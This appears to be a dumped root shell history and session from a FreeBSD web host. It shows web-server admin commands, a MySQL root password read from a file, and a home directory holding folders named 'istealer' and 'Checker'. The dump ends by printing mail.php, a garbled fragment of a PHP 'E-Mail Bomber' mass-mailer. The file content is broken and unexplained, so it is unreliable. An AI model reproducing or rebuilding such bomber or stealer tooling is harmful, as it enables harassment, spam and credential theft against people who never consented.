/usr/local/etc/rc.d/mysql-server restart mysql -uroot -p`cat /etc/my.passwd ` mc gstat ps auxf ifconfig ee /usr/local/etc/apache22/httpd.conf ee /usr/local/etc/nginx/nginx.conf /usr/local/etc/rc.d/apache22 restart /usr/local/etc/rc.d/nginx restart /usr/local/etc/rc.d/nginx stop ifconfig ifconfig head /usr/local/etc/apache22/httpd.conf ps auxf ee /usr/local/etc/apache22/httpd.conf /usr/local/etc/rc.d/apache22 restart ls -la /home/freakyfreehack/ ee /usr/local/etc/apache22/httpd.conf /usr/local/etc/rc.d/apache22 restart ls -la /home/secunet/ tail -f /var/log/httpd/httpd_access.log /usr/local/etc/rc.d/apache22 restart mc /usr/local/etc/rc.d/apache22 restart ifconfig mc ps wauxf ifconfig tail -f /var/log/httpd/httpd_access.log | grep server killall -9 tail tail -100 /var/log/httpd/httpd_access.log | grep server ps wauxf tail -1-00 /var/log/httpd/httpd_access.log | grep server tail -1000 /var/log/httpd/httpd_access.log | grep server ps wauxf history ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l /usr/local/etc/rc.d/apache22 restart ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l ps ax | grep http | wc -l mc apachectl restart apachectl stop apachectl start top /usr/local/etc/rc.d/apache22 restart top head /usr/local/etc/apache22/httpd.conf ps wauxf ps wauxf | gre nginx ps wauxf | grep nginx cd /home/ grep testsite15.w2c.ru /usr/local/etc/apache22/vhosts/* cd /home/forsirius/testsite15.w2c.ru ls -la grep testsite.w2c.ru /usr/local/etc/apache22/vhosts/* grep w2c.ru /usr/local/etc/apache22/vhosts/* cd /home/forsirius/testsite15.w2c.ru ls -la ifconfig cd .. ls -la cd .. ls -la mc cd /home/forsirius/testsite.w2c.ru grep w2c.ru /usr/local/etc/apache22/vhosts/* ifconfig cat /etc/rc.conf cat /etc/rc.conf ifconfig cat /etc/rc.conf cat /etc/rc.local cat /etc/rc.local cat /etc/rc.conf cd /home/224422/ ls -[la ls -la cd 224422.w2c.ru/ ls -la ls -la cat index.php cd inn cd inc ls -la cd .. ls -la ls -la pwd ls -la adm date ntpdate -v -b in.pool.ntp.org ntpdate -v -b pool.ntp.org date 0037 date date --help date mc ps ax /usr/local/etc/rc.d/apache22 start ps ax ps ax ps ax /usr/local/etc/rc.d/apache22 restart mc /usr/local/etc/rc.d/apache22 restart top /usr/local/etc/rc.d/apache22 restart top -S netstat top -S tcpdump exit /usr/local/etc/rc.d/apache22 restart exit ps ax exit cat /usr/local/etc/apache22/vhosts/hackerzhub.conf cat /usr/local/etc/apache22/vhosts/secunet.conf history | grep php ee /usr/local/etc/php.ini tail -100 /var/log/httpd/httpd_access.log grep hackbase.cc /usr/local/etc/apache22/vhosts/* cd /home/webserver/hackbase.cc ls -la ee info.php ee /usr/local/etc/php-apache.ini /usr/local/etc/rc.d/apache22 reload /usr/local/etc/rc.d/apache22 reload /usr/local/etc/rc.d/apache22 restart nslookup nslookup exit # cd /home # ls -la total 36 drwxr-x--x 9 root wheel 512 Oct 14 00:41 . drwxr-xr-x 18 root wheel 512 Jul 1 01:53 .. drwxrwxr-x 4 224422 www 512 Oct 9 20:19 224422 drwxr-x--- 5 4004 www 512 Oct 8 18:55 4004 drwxr-x--- 10 hbstream www 512 Oct 9 19:37 hbstream drwxr-x--- 5 secunet www 512 Jul 6 21:14 secunet drwxr-x--- 3 testserver www 512 Sep 21 18:11 testserver drwxr-x--- 3 testsite www 512 Sep 2 06:55 testsite drwxr-xr-x 6 webserver www 512 Oct 14 00:37 webserver # cd 224422 # ls 224422.w2c.ru temp # ls -la total 16 drwxrwxr-x 4 224422 www 512 Sep 18 18:05 . drwxr-x--x 9 root wheel 512 Sep 30 10:52 .. drwxrwx--- 4 224422 www 512 Sep 20 18:24 224422.w2c.ru drwxrwx--- 2 224422 www 2048 Sep 20 15:04 temp # cd 224422.w2c.ru # ls -la total 36 drwxrwx--- 6 224422 www 512 Oct 18 17:58 . drwxrwxr-x 4 224422 www 512 Oct 9 20:19 .. drwxrwxrwx 3 224422 www 1024 Sep 18 17:26 Checker -rw-r--r-- 1 224422 www 1034 Sep 20 18:24 index.html drwxr-xr-x 11 224422 www 512 Sep 19 17:36 istealer -rw-r--r-- 1 224422 www 2704 Oct 18 17:58 mail.php drwxrwxrwx 2 224422 www 512 Oct 13 21:46 test drwxrwxrwx 3 224422 www 512 Oct 13 21:41 test2 # cat mail.php E-Mail Bomber email, $bom, $anon, $von); if($mail == TRUE){ echo $row->email . " hat EMail erhalten."."
";} else{ echo $row->email . " hat keine Email erhalten."."
";} } } ?>
######################################
##########-DB-Mass-Mailer--###########
#################-by-#################
##############--bebop--###############
######################################

Email-Liste:
Betreff:
von: